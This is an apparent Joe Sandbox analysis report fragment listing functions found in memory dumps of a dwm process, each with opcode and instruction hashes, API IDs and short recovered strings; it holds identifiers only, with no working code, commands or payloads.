                        • Instruction ID: fe97a38da3887d38fe6b381f39902a620a8e1cdc3aeecd6a6c1a845a779baaae
                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                        • Instruction Fuzzy Hash: 33E18E72B00B488AEB60DF75D88839D77A0F745B9CF160216EE8997B9DCB35C191CB80
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                        • String ID: csm$csm$csm
                        • API String ID: 849930591-393685449
                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction ID: a71ae389052bf5c7477b96fab8a708b2f053a377208367fefffcd455af848454
                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                        • Instruction Fuzzy Hash: 00E19BB2B04B888AEB609F65D8883AE77F0F749B9CF111115EE8957B9DCB36C091C704
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: AddressFreeLibraryProc
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3013587201-537541572
                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction ID: 34a5f04a675c29bba45678afa4d8b339d85152c9007b66407814b85f4990bcd6
                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                        • Instruction Fuzzy Hash: EF41D432B12A0892FB56CB16AD08B556391F749BE8F1A43269D1E8778DEE3EC445C390
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                        • String ID: d
                        • API String ID: 3743429067-2564639436
                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction ID: 6ff0f4e31309fca1d91147f0176eb4e575f76b7881582bbc4aebeb93d6a23bf7
                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                        • Instruction Fuzzy Hash: 6D414E32614B88C6E760CF21E85879A77B1F388B99F45822ADA890B75CDF39C549CB40
                        APIs
                        • FlsGetValue.KERNEL32(?,?,?,0000026DB167C7DE,?,?,?,?,?,?,?,?,0000026DB167CF9D,?,?,00000001), ref: 0000026DB167D087
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB167C7DE,?,?,?,?,?,?,?,?,0000026DB167CF9D,?,?,00000001), ref: 0000026DB167D0A6
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB167C7DE,?,?,?,?,?,?,?,?,0000026DB167CF9D,?,?,00000001), ref: 0000026DB167D0CE
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB167C7DE,?,?,?,?,?,?,?,?,0000026DB167CF9D,?,?,00000001), ref: 0000026DB167D0DF
                        • FlsSetValue.KERNEL32(?,?,?,0000026DB167C7DE,?,?,?,?,?,?,?,?,0000026DB167CF9D,?,?,00000001), ref: 0000026DB167D0F0
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Value
                        • String ID: 1%$Y%
                        • API String ID: 3702945584-1395475152
                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction ID: 954a692aea3c88c5f7c9bf3f83e41f5beb921ddac45903a4d90f3b8dbe18f632
                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                        • Instruction Fuzzy Hash: 6B112B30F0624C41FA6957356D5D73961415B543FCF265B24AC39877DEDE2BCC42C680
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                        • String ID:
                        • API String ID: 190073905-0
                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction ID: 2ca1e9cc0510a1dc83c4ebc1fdbe52a86d72ccc91c1eb08f60ecf2a3e7dfac66
                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                        • Instruction Fuzzy Hash: 1C81F431F0034D86FB58AB69AC4D3A962D1A795B8CF1747259E048739EEF3BC94587C0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Library$Load$AddressErrorFreeLastProc
                        • String ID: api-ms-
                        • API String ID: 2559590344-2084034818
                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction ID: 80910329edf1ffe029c007fae956e48e731b96fd432fa162dc60bd09946df316
                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                        • Instruction Fuzzy Hash: 6831E631B12A48E1EE56DB06AC0876523E4FB48BB8F5B0B259D1D4B39DEF3AC445C390
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                        • String ID: CONOUT$
                        • API String ID: 3230265001-3130406586
                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction ID: 3be29c8b6ee06a43f894d8c0eb8399b5c23dbc4296c6f4c38889353b0137a19b
                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                        • Instruction Fuzzy Hash: 4D11BF31B10B4486E7508B16EC4831972A0F398FE9F150226EA5A877A8CF79C904C784
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID: dialer
                        • API String ID: 756756679-3528709123
                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction ID: 06a9731fad265eec720ec02330506c44b2bc856f006b4449f55516324d5893dd
                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                        • Instruction Fuzzy Hash: 7231D632B01B5983E715CF1AED4872967A0FB54B88F0A4225DF4847B59EF3AC461C780
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Value$ErrorLast
                        • String ID:
                        • API String ID: 2506987500-0
                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction ID: 8272e313bf2f98c1d76c3ec524ba701b3a36f3d82fe69078ea371fff082c91ce
                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                        • Instruction Fuzzy Hash: 03118430F0528C82FA6597359D5D73962426F587FCF261B24AC36877DEEE6BC841C680
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                        • String ID:
                        • API String ID: 517849248-0
                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction ID: 789c2f29df80aab3585e76fc158d761d8be0ff1fc08a61dd6c3f348cad7b4e43
                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                        • Instruction Fuzzy Hash: B4018C31B00A4882EB20DB52E84C75963A1F798FC9F894036DE8943759DF3EC989C780
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                        • String ID:
                        • API String ID: 449555515-0
                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction ID: 004c33209a75407f1c5ac69e976e5f372781efe8c72add93c4a71acd2f2cafed
                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                        • Instruction Fuzzy Hash: 27012D75B11748C2EB249B21EC0C71563B0BB59B8AF050529CD4907759EF3EC159C784
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 2395640692-629598281
                        • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                        • Instruction ID: 69994dd598234411c7b9776327e139b7e875aea56ba6b2b073d6758336156509
                        • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                        • Instruction Fuzzy Hash: 3B51BB32B116088AEB14CF25EC4CB5937E6F354BADF128628EE064778CEB36C851C780
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: FinalHandleNamePathlstrlen
                        • String ID: \\?\
                        • API String ID: 2719912262-4282027825
                        • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction ID: 6822d15bf2ea4c1d5abf329f3c2442f3a60ca9e6f7f68888c1e393d3424ea368
                        • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                        • Instruction Fuzzy Hash: E0F0AF32B0064882EB209F20FC8875963A0F75CB8CF854022CE494AA5CDF3EC68DCB40
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CombinePath
                        • String ID: \\.\pipe\
                        • API String ID: 3422762182-91387939
                        • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction ID: 963ea69bb4682f8552846d996114bcaf5ce1374b44dfe754e358df0448e0bb9e
                        • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                        • Instruction Fuzzy Hash: 49F08C34B04B8882EA008F53BD0C1196260AB58FC8F09A132EE4A47B1CDF3DC5458780
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction ID: 60f506ef8e0a0636e45ed3efbc37f7172bb7ce73cd0bb4b9d645508b14d16507
                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                        • Instruction Fuzzy Hash: AAF06271B1170881EB148B24EC4C3596320EB9476DF55431ACA6A451E8DF2EC145C780
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentThread
                        • String ID:
                        • API String ID: 2882836952-0
                        • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                        • Instruction ID: 71a3a1791fbbd8631bb61634eba42eef120f79253a15aa8acee1f2e9ac7226c5
                        • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                        • Instruction Fuzzy Hash: 2C61AC36A19B88C7E7608B15E84831AB7E0F389798F121256EE9D47BACDB7DC540CF44
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 2fd8bc095ae1dc8d3ecf83b9451b2106d68af31dc6b82ace00c112ea6864c00c
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: 9011E572F64F5821F6641568EC5E37911506B783BDF0B0637AAF607BEECB2AC84182C0
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: _set_statfp
                        • String ID:
                        • API String ID: 1156100317-0
                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction ID: 6024598afb9eed673d7ff236861958cb1af284cf447671a4e367276256a8206a
                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                        • Instruction Fuzzy Hash: 8C11A332F5CA1D51FAE42D29EC4E37916F06B7937CF4B8638A966063DECE26CB414109
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: _invalid_parameter_noinfo
                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                        • API String ID: 3215553584-4202648911
                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction ID: 27a2e66b669eab1c753a4d15e3227e235cac53aca00fd6f010fea62aea5effd2
                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                        • Instruction Fuzzy Hash: 5A619136F0064C46FA698F69ED4C33B6AF1E78674CF538816CA4A177ACDB36C9418318
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CallEncodePointerTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3544855599-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: ed75307b36ac753cbe7fa5074f57d764205b0379fdba377acf537441d2e996c4
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: 15614632B01B888AEB20DF65D8843AD77A0F348B9CF194615EF4957B98DB39C595C780
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: 6b6a5d49be0c3c18dac6387b2fdc6ee7f08cef51d343966d1b910193e6e8642d
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: CC519272B00388CAEB748F16998835977A0F354B9DF1A9315EE5987BDDCB39D490CB80
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                        • String ID: csm$csm
                        • API String ID: 3896166516-3733052814
                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction ID: aa95c2ac0a2d4a6e4e7dc239bd489115e364599340e9f0847862f20b77fb2399
                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                        • Instruction Fuzzy Hash: 43519E32B01688CAEB748F15985837E77F0F355B88F1A4116DA9987BDDCB7AD490C708
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction ID: 8e97cc8600b33874dade295c5adcc06b57596480224dc06543bde7582faf4c61
                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                        • Instruction Fuzzy Hash: F151DE32B116089AEB15CF15E848BBA37F5F359B9CF66A124DA164378CEB36D841C708
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: CurrentImageNonwritable__except_validate_context_record
                        • String ID: csm$f
                        • API String ID: 3242871069-629598281
                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction ID: 02dfdf68898d8c9c4dc96dde9d72021752e44a20d3889774263a11bd8cfbf571
                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                        • Instruction Fuzzy Hash: 0C318B32B1164896EB15DF11EC48BAA77F4F349B9CF669018EE5A0778CDB3AD940C708
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: FileWrite$ConsoleErrorLastOutput
                        • String ID:
                        • API String ID: 2718003287-0
                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction ID: 5db4bf35490c9535bfb789867f251264d725460648658cf3397f4fdb5e86765b
                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction Fuzzy Hash: 5ED10372B15A8889E711CFB9D84839C3BB1F35479CF11421ACE5EA7B9DDA36C406C390
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction ID: 616520f4e758efb2071ff87cfe3e843c1d7a651e35575c538645b5f7045acf14
                        • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction Fuzzy Hash: 3D015E32A01B98C6D704DF6AED0814A77A0F798F8AF054426EF894372EDE39C051C780
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ConsoleErrorLastMode
                        • String ID:
                        • API String ID: 953036326-0
                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction ID: 9cfadaf4278a1a042e4a221af9e5ea8801c7b6c357dc5ef3b2758d2e7e777b58
                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction Fuzzy Hash: 1E91B372F1165889F7609F659C883AD3BA0F754B8CF16410FDE0A6769DDB36C486C780
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                        • String ID:
                        • API String ID: 2933794660-0
                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction ID: 47968e999b61308f49ce7e01167395efad535526a62dfb10e2b566ede07d25a3
                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction Fuzzy Hash: FB113032B10F058AEB00CF64EC593A833A4F71976CF450E21EA6D467A9DF79C1A8C380
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction ID: 78f7fafe200708843e340e4dc25fecd37768daa2e3b960b486fcb56aa6fba473
                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction Fuzzy Hash: CB71F336B0078986E725DF259D483BAA7A4F389B8CF56022ADD0943B8DDF36C645C780
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: CallTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3163161869-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: 96189fdb050394e3dddf355c179918c5da2f206e1441c6d51b5262eb5e2b80f4
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: 80614372A00B888AEB20DF65D8843AE77B0F788B9CF154215EE4917B9CDB3AD195C744
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction ID: 6757882edd15c92c02be4a4c64f007955a3ff6155e70e70bb19f3b41c0914e66
                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction Fuzzy Hash: 4351C432B0478981F674DF29E89C3AA6765F385788F46022DDE5A03B9DDA3BC945C7C0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: U
                        • API String ID: 442123175-4171548499
                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction ID: afbf1178cc8222802efba89ca99b38783906569562458b943e92f1470ffb59b4
                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction Fuzzy Hash: 5641F772B25B8482DB20DF25EC483A977A0F398798F524026EE4D87798EF3DC445C780
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ExceptionFileHeaderRaise
                        • String ID: csm
                        • API String ID: 2573137834-1018135373
                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
